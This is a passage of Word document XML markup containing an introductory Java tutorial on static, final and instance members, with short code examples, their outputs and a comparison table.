          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539AA991"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1FD322"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ount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8F39598"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cou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tatic variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BEC4AF"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C2699"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increme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3B177D3"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        cou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tatic variable can be accessed without creating an instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4EB4FD"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88237DD"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5C69E"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1711E"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es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81D5DF3"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9A9E2C8"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ounter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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ounter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356DF2A4"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ounter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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ounter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56024B34"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        c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crement</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310BEAA0"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        c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crement</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134C2B5"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oun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u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 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E77A3"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256DD51" w14:textId="67DE0054"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA9048"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e example above, both c1 and c2 share the same static variable count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE25AC" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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b) static with Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE819B8"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static method can be called without creating an instance of the class. It can access only static variables and other static methods of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F6057"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD618AC"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thOperation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F7D662F"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square</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8C601E6"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x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x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F43B2D1"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32FC2BC"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E72B9"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E940789"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es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FF1F4ED"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04DFFFE"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resul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thOperation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quar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No need to create an instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B626939"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sul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 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296B8128"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C75940A" w14:textId="4EDFE525"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685BFD6E" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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 static with Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1646BE"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static block is used to initialize static variables. It is executed when the class is loaded into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4C26F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536258D9"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0565123"/>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EF75924"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05651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223BD5A"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05651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tatic block is executed."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60240886"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05651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167ECFF"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0565123"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFBD730"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05651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A7B437F"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05651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tatic block will be executed when the class is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9511A"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05651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58A0BF5" w14:textId="394E7393"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0565123"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06163F48"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E866C53"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tic block is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F6645A" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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3. Non-Static (Instance) Members in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78748D02"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we say </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, we are referring to members that are specific to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>individual instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the class. These members belong to the object (instance) of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A528E66" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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 Non-Static Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D9E85"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n-static variables are specific to each instance of a class. Every object created from the class gets its own copy of the instance variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D272863"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DEC286"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DD9903A"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nstance variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7F0386"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nstance variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B6E84D"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FA836D"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D90C1F1"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456D101E"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ag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ge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04103960"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D75CF9E"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAAE5FF"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56463C61"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es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F873FC9"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2A6E719"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p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Joh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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC8532"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p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li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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8EA435"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 John - 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E6551"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 Alice - 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C182CF"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4C2ABAE" w14:textId="259423E2"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C97E9B3"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 name and age are non-static (instance) variables, meaning each Person object will have its own set of name and age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED4248" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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b) Non-Static Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B149E38"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n-static methods operate on the instance data (non-static variables) and can only be called by creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2106B0EC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F246A"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alculat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5A4CBDB"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nstance method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2D3FC3"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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F40650"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4A30940"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA69C17"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBEEEE8"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es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6DFF7E0"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9350BB0"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alculator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> calc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alculator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E4B6F"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alc</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 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670BBC3" w14:textId="77777777"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70ED1FA" w14:textId="3308D29E" w:rsidR="00076807" w:rsidRPr="00CE4B95"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1A0A5263" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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 of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6"/>
        <w:gridCol w:w="2764"/>
        <w:gridCol w:w="3355"/>
        <w:gridCol w:w="3159"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w14:paraId="1531912F" w14:textId="77777777" w:rsidTr="00CC3DB6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19077157" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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ept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D93D41F" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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inal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B3D87F9" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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atic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="429625B6" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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Non-Static (Instance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w14:paraId="776BDCB0" w14:textId="77777777" w:rsidTr="00CC3DB6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="299B784A"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ariables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C627BE9"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stant; cannot be reassigned.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="793868FE"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hared among all instances of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0420BFD4"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ecific to each instance of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w14:paraId="4A4DE99A" w14:textId="77777777" w:rsidTr="00CC3DB6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FFE405F"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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57F88734"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not be overridden.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7467B81E"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longs to the class itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A0F5C1F"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longs to an instance of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w14:paraId="1DD4856A" w14:textId="77777777" w:rsidTr="00CC3DB6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A0798B5"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lasses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="007A107B"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not be subclassed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65D6DF0D"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A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F37E18B"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A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D0EE6FB" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC02338" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to define constants, prevent method overriding, or prevent subclassing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4913F4E2" w14:textId="77777777" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6">
      <w:pPr>
        <w:numPr>
